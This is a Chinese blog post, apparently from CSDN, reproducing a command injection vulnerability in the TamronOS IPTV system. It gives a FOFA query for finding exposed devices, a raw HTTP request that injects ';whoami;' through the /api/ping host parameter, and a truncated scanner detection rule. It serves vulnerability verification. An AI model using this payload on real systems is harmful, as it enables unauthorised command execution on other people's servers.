TamronOS IPTV系统存在命令执行漏洞(含批量验证poc)

已于 2024-04-07 13:53:46 修改
阅读量110 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
于 2024-04-07 13:53:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137461584
版权

产品简介
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案。系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。
漏洞描述
TamronOS IPTV 存在系统命令注入漏洞。
fofa
app=”TamronOS-IPTV系统”
漏洞复现

POST /api/ping?count=5&host=;whoami; HTTP/1.1
Host: 
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

image.png


检测poc规则编写

params: []
name: TamronOS IPTV系统存在命令执行漏洞
set: {}
rules:
- method: GET
  path: /api/ping?count=5&host=;whoami;
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.bod
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现 || TamronOS IPTV系统命令执行漏洞
失心少年
07-11 404
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。1.使用POC执行ping命令,得到回显。
Oracle WebLogic Server远程代码执行漏洞 CVE-2024-14750 已亲自复现_cve-2024-14750漏洞复现
2401_83621661的博客
04-15 326
Oracle Fusion Middleware的Oracle WebLogic Server产品中的漏洞(组件:控制台),允许未经身份验证的攻击者通过HTTP访问网络,从而导致Oracle WebLogic Server被接管。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。vulfocus下载链接。启动vulfocus。
TamronOS IPTV系统 ping 任意命令执行漏洞
Jietewang的博客
12-22 4162
TamronOS IPTV系统 ping 任意命令执行漏洞 目录 系统简介 漏洞描述 漏洞复现 总结 系统简介 TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。 同时系统支持多种节目源接入(卫星源、广电源、运营商IPTV源、网络源、自办频道、编码器等其他第三方设备提供的源)。基于Apple公司的HLS直播传输技术,以及我公.
TamronOS IPTV系统存在命令执行漏洞批量验证poc),作为网络安全开发程序员
2401_83947105的博客
04-14 706
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
php schedule 只执行一次_我们可以控制你看到的内容:主流IPTV远程代码执行漏洞分析...
weixin_39965881的博客
12-03 142
概述大约在一年前,Check Point研究团队发现乌克兰电视流媒体平台存在严重漏洞,一旦被利用,可能会使服务提供商面临严重风险。具体而言,攻击者可能会获取整个客户数据库中的个人信息和财务详细信息,并且攻击者还可以将其选择的任何内容以流式传输到其客户网络的屏幕上。尽管不确定存在漏洞的确切数量,但Check Point研究团队发现有超过1000家提供此项服务的提供商,其全球客户的数量可能会非常高。...
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
该“NACOS身份认证绕过漏洞批量检测poc”是一个Proof of Concept(概念验证)文件,用于验证这个安全漏洞是否存在POC文件通常包一段代码或者脚本,开发者或安全研究人员可以使用这些代码来测试特定系统是否易受...
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
深入浅析ImageMagick命令执行漏洞
09-21
然而,ImageMagick的一个严重安全问题在于它的命令执行漏洞,这可能导致远程攻击者通过构造带有恶意代码的图片文件,执行任意系统命令,从而对服务器造成威胁。 漏洞的根源在于ImageMagick处理HTTPS格式文件的方式...
第五节 命令执行漏洞利用-01
09-15
命令执行漏洞是一种常见的安全漏洞,攻击者可以通过命令执行漏洞执行恶意命令,获取服务器的控制权。今天,我们将深入探讨命令执行漏洞的利用方法,包括 PHP 下命令执行的补充、eval 函数的介绍、命令执行实验环境...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
Goby POC,1275个,自己在网络上收集的,基本是网上能找到的最全的了
07-24
我自己在网络上收集的Goby的POC,导出后是1275个,列表如下,列表写不全的,有兴趣的话,自己下载下来研究一下吧,最近我又想着自己去写一些POC供给大家用,暂时没有时间和动力,再等一段时间的吧。 TamronOS_IPTV_RCE.json TamronOS_IPTV_system_Filedownload_CNVD_2021_45711.json TamronOS_IPTV_system_RCE.json Tenda-AC15-1900-telnet-║≤├┼.json Tenda-AC15-1900-telnet-后门.json Terramaster-F4-210-Arbitrary-File-Read.json Terramaster-F4-210-Arbitrary-User-Add.json Terramaster-F4-210-name-RCE.json TerraMaster-TOS-Information-Disclosure-(CVE-2020-28185).json TerraMaster-TOS-RCE-(CVE-2020-15568).json
验证实例名称是否正确并且允许远程连接_我们可以控制你看到的内容:主流IPTV远程代码执行漏洞分析...
weixin_29532075的博客
12-30 364
概述大约在一年前,Check Point研究团队发现乌克兰电视流媒体平台存在严重漏洞,一旦被利用,可能会使服务提供商面临严重风险。具体而言,攻击者可能会获取整个客户数据库中的个人信息和财务详细信息,并且攻击者还可以将其选择的任何内容以流式传输到其客户网络的屏幕上。尽管不确定存在漏洞的确切数量,但Check Point研究团队发现有超过1000家提供此项服务的提供商,其全球客户的数量可...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 591
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
TamronOS IPTV系统任意用户添加修改
qq_17754023的博客
08-11 1764
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。基于Apple公司的HLS直播传输技术,以及我公司自主研发的动态内存切片技术,在使用 流媒体输出的同时保证了最大用户待机量(一个千兆口1500用户、一个万兆口6-8K用户),同时也是国内唯一能实现单台服务器负载140-200路直播的IPTV系统。添加10086用户,密码为1008611。...
IPTV系统搭建网络盒子APK和后台管理软件
dianliang01的博客
07-16 5971
很多在咨询IPTV的时候,不知道IPTV搭建整个系统是包网络盒子APK以及后台管理软件两部分。这里点量软件小编就和大家做个简单的介绍。IPTV系统在搭建的时候一般都是由两部分:apk和后台管理系统,从名字和实际 的使用中我们也可以看出这两部分的作用,APK是用户安装后使用的,作用主要是展示呈现给用户的内容,而后台的作用是管理整个apk展示的内容以及用户数据等,所以才有前端(apk)展示后端(后台)管理的说法。 IPTV系统中APK可以展示的内容比较直观,比如会员的注册页面、直播点播展示播放页面、广告等等
IPTV系统云桌面管理:开机广告+三方apk管理+图文介绍
dianliang01的博客
09-14 3422
IPTV系统根据不同的需求,可以做的的丰富也可以做成非常简单的形式。而zui简单的应该就是桌面云管理系统了。主要功能就是作为入口管理各种功能模块,这里以酒店IPTV系统云桌面管理系统为例说明: 酒店IPTV云桌面管理系统常用的功能有以下主要的: 开机广告,需要每个酒店都有自己不同的开机广告 桌面滚动文字广告,这个可以自己在后台编辑后出现桌面上方,比如可以是欢迎入住本酒店,请注意关好房门,如有问题欢迎随时联系前台000000. 直播、点播都用第三方apk,这个只是一个调起的功能,如果是盒子中已经有的a
IPTV内容安全架构的研究
Mckay的专栏
08-02 1443
作者:段世惠      IPTV的发展使得其内容安全问题越来越受到关注,IPTV内容安全问题的解决有助于IPTV业务的大规模开展。本文首先简单给出了IPTV业务的内容安全威胁,针对IPTV产业链分析了其中4个环节上的内容安全需求,在此基础上提出了IPTV内容安全架构,最后讨论了与内容安全密切相关的内容安全监控。    1、前言    IPTV是一种采用IP协议在公共互联网上传输视频点播
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 542
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
nacos身份认证绕过漏洞批量检测poc
06-23
通过进行nacos身份认证绕过漏洞批量检测Poc,可以及时发现和修复nacos系统中的漏洞问题,从而提高系统的安全性和稳定性。同时,作为云原生的重要组件之一,nacos系统的安全问题也需要得到更高的重视和加强保护。 #...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值